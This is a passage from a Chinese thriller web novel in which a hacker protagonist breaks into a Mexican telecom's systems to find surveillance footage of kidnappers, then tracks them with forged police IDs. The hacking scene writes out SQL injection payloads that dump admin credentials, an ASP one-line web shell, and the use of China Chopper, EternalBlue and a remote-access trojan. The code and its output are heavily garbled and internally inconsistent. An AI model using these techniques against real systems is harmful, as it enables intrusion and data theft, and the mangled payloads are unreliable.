王涛是网络安全专业的毕业生。
首先想到的就是利用网络查询。
通过路口的监控摄像头确定绑匪的活动轨迹。
墨西哥城警务系统采用的是Telcel电信公司的数据网络。
入侵Telcel机房,内网渗透,目录遍历。
找到监控摄像头数据。
王涛离开酒店。
在没有监控的街角,买了20部Telcel的预充值手机。
回到酒店。
打开自己的笔记本电脑。
启动VMware Workstation虚拟机。
查询到Telcel官方网站。
点击页面的充值链接。
登录采用的是短信验证功能。
在登录界面输入’。
页面提示 “near ''%'''' at line 1”。
充值数据库存在注入漏洞。
查询数据库的字段。
’order by 12# 显示Error: Unknown n ''12'' in ''order cuse''
第12行没有漏洞。
继续测试。
’order by 11# 显示Error: Unknown n ''11'' in ''order cuse''
第11行也没有漏洞。
继续测试到第9行的时候发现了漏洞。
'' order by 7 #
Tile Relese Chaacter Gere qwas
World War Z Gery Lne horr asxz
The Drk Kight Ries Buce Wyion asxz
The Amazing Spider-Maer Paker a asxz
The Inredible Hulk Brce Banner a asxz
The Fst ad the Furious Brian O''or a asxz
Iron Mn Toy Strk a asxz
Ma of Stel Clrk Ket a asxz
G.I. Je: Retlition Cora nder a asxz
Termnator Sation Jhn or si-fi asxz
6个字段
继续查询可显示的字段数。
-1'' unio 1,2,3,4,5,6,7 #
Tile Rese Carater Gere Ib
2 3 5 4 Lnk
2,3,4,5 为可显示字段
爆破数据库。
1'' uno 1,daabse(),3,4,5,6,7 #
Tile Reease Chaacter Gnre IMb
3 2 3 5 4 Lik 没有爆出数据库
1'' uno 1,dtabase(),3,4,5,6,7 #
Ttle Relse Chracer Gre IMb
qwas 3 5 4 Lik
库名:qwas
爆破数据库的关键内容。
-1'' uno 1,n_nme,3,4,5,6,7 fom infrmation_shema.s whee tble_scema=dataase() nd tale_nme=''usrs''#
Tile Relese Chaacter Gere IDb
id 1 2 6 Lik
login 1 2 6 Lik
password 1 2 6 Lik
Eail 1 2 6 Lik
seret 1 2 6 Lik
actiatio_code 1 2 6 Lik
actvated 1 2 6 Lik
admin 1 2 6 Lik
一共8个字段,确定 login,admin,password
查询字段内容。
-1'' unio 1,login,password,4,admin,6,7 from qwas .users#
Ttle Relese Charcter Gere IDb
B.I.M. 6885858486f310435839c73599457f045affd0 1 Lnk
qwas 6885858486f31043e5839c735d99457f045affd0 1 5 Lnk
一共两个。
解密。
B. I.M. Telcel123456
qwas Telcel123456
王涛利用注入漏洞爆破出来的管理员密码。
账号:awas。
密码:Telcel123456。
利用管理员账号密码登录Telcel网站。
看到介绍企业文化的文章。
编辑文章,上传一句话木马。
Asp一句话木马:<%eval requst(“xxx”)%>。
利用“中国菜刀”连接已经上传后的一句话木马。
可以看到充值服务器的硬盘数据。
搜索局域网找到命名为“videos”的计算机。
使用米国cia的“永恒之蓝”武器库。
溢出“videos”计算机。
上传免杀后的“灰鸽子”。
看到了事发当天教堂附近监控拍下的画面。
是三辆本田REBEL500(叛逆者)上面的劫匪绑架女孩。
本田REBEL500(叛逆者)售价超过2万美元。
在人均收入3000美元的墨西哥,能承担本田REBEL500(叛逆者)价格的人数寥寥无几。
这也提醒王涛。
选择普通的代步工具可以降低被发现的概率。
绑匪离开宪法广场后,沿着公路直行。
丝毫不躲避沿途摄像头的拍摄。
遇到第一个分叉路口向右转。
行驶了200左右的时候向左转。
直行2公里有一家名为“tacos los grillos”的餐厅。
一名绑匪走进餐厅拿出了一大包物品。
可以看到里面有2L规格的可口可乐。
摩托车对继续行驶100米后右转。
进入了出城告诉。
一直行驶了15公里。
出城以后道路上没有摄像头了。
王涛将本田REBEL500(叛逆者)的照片打印了出来。
伪造了两张墨西哥警察的证件。
上面的照片是经过伪装后的王涛,彼得洛夫。
准备进行田野调查。
追查本田REBEL500(叛逆者)就能找到绑匪的地址。
此时已经12点了。
早饭变成了午饭。
走到彼得洛夫的房间。
里面很安静没有声音。
“昨天晚上太用力,彼得洛夫有可能猝死吧!”
“咚咚咚!”
王涛敲了门。
里面出现了脚步声。
开门的正是彼得洛夫。
“有任务,我在楼下等你。”
王涛说完,特意向门内看了一眼。
全身雪白的女郎躺在床上美丽动人。
午餐是玉米饼和咖喱牛肉。
彼得洛夫挽着女郎的腰走出了楼梯。
女郎径直离开了酒店。
彼得洛夫来到餐厅。
坐到王涛的对面。
举起手示意服务员点餐。
他点了大份牛肉寿喜锅,柠檬生蚝和全麦面包。
“牛肉是最好的补品。
比威尔刚更强效。”
彼得洛夫开始描述和女郎的亲密互动。
“你付了多少钱?”
王涛问了一个很有用的问题。
“1000美元。”
彼得洛夫说完话,一口吞掉了一只生蚝。
吃完午饭。
两人乘坐王涛的dmi前往郊区。
在车上彼得洛夫分析绑匪的特点。
通过绑匪驾驶本田REBEL500(叛逆者),可以侧面推论。
绑匪们有很强的的经济能力。
绑架之后,径直在公路上行驶。
不惧怕警察,不躲避摄像头。
说明绑匪有很强大的社会背景。
“我们首先要做的是保护自己。”
彼得洛夫说完话。
将假胡子沾到脸上。
车停在了一家披萨店的门前。
两名经过伪装后的警察走进了店内。
王涛拿出警察证件。
彼得洛佛将绑匪的照片交给店员辨认。
“我认识他们。
上午的时候他们骑着一样的摩托车过来购买了比萨。”
店员说道。
“他们买了什么东西?”
王涛继续问道。
“3盒12寸的牛肉披萨。
15瓶2L容量的可乐,雪碧。”
店员详细描述绑匪购买的物品信息。
“北极星”二人组按照店员指示的方向继续追寻。
12寸比萨可以供3个人吃。
绑匪至少有9个人。
王涛,彼得洛夫分析对方的人数。
两人只带HK45C手枪。
火力上没有优势。
只能进行侦查。
前面的道路两旁都是灌木。
没有人家可以进行询问。
在经过一个路口时。
彼得洛夫要求停车。
两人走到楼口。
看到了地上清晰的摩托车痕迹。
确定绑匪的方向了。
坐上dmi继续追击。
行驶了2.6公里。
摩托车轮胎的痕迹,进入了一家养猪场。
王涛对这个画面很熟悉。
《德州电锯杀人》里面就是用猪吃到被害人的尸体。
比亚迪dmi没有停留。
直接向前开出了1公里的距离。
停车后,两人拿出HK45C手枪。
翻过猪场的围栏。
小心地靠近猪舍。
猪场臭气熏人。
他们看到了参与绑架的3辆摩托车停在正门位置。
在车上的时候,两人已经确认。
只需拍下女孩的照片就能完成任务。
“砰!”
“哈哈!!”
两人听到枪声露出了惊恐表情。